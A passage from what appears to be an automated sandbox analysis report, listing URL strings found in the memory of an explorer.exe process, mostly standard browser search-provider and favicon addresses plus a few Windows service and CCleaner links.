          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.daum.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.dreamwiz.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.in/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ebay.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.empas.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.espn.go.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gamer.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.gismeteo.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.goo.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.hanafos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.interpark.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.ipop.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&amp;q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&amp;q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.live.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.livedoor.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.lycos.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.jp/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.co.uk/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com.cn/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.msn.com/results.aspx?q=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nate.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.naver.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.nifty.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.orange.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.rediff.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.seznam.cz/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.sify.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahoo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yahooapis.jp/AssistSearchService/V2/webassistSearch?output=iejson&amp;p=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search.yam.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search1.taobao.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://search2.estadao.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://searchresults.news.com.au/
          Source: explorer.exe, 00000007.00000000.2185297080.0000000004F30000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://service2.bfast.com/
          Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://sitesearch.timesonline.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://so-net.search.goo.ne.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.aol.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.freenet.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.lycos.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.t-online.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://suche.web.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://treyresearch.net
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://tw.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://udn.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.ask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://uk.search.yahoo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://vachercher.lycos.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://video.globo.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://web.ask.com/
          Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://wellformedweb.org/CommentAPI/
          Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
          Source: explorer.exe, 00000007.00000000.2176816601.0000000001C70000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.abril.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.afisha.ru/App_Themes/Default/images/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.alarabiya.net/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/exec/obidos/external-search/104-2981279-3455918?index=blended&amp;keyword=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.com/gp/search?ie=UTF8&amp;tag=ie8search-20&amp;index=blended&amp;linkCode=qs&amp;c
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.amazon.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.aol.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.arrakis.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.asharqalawsat.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ask.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.auction.co.kr/auction.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.baidu.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cdiscount.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ceneo.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.chennaionline.com/ncommon/images/collogo.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cjmall.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.clarin.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.cnet.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.dailymail.co.uk/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2184896064.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2183037587.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2182495093.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2181905555.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.2191880997.000000000861C000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000007.00000000.2195604665.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
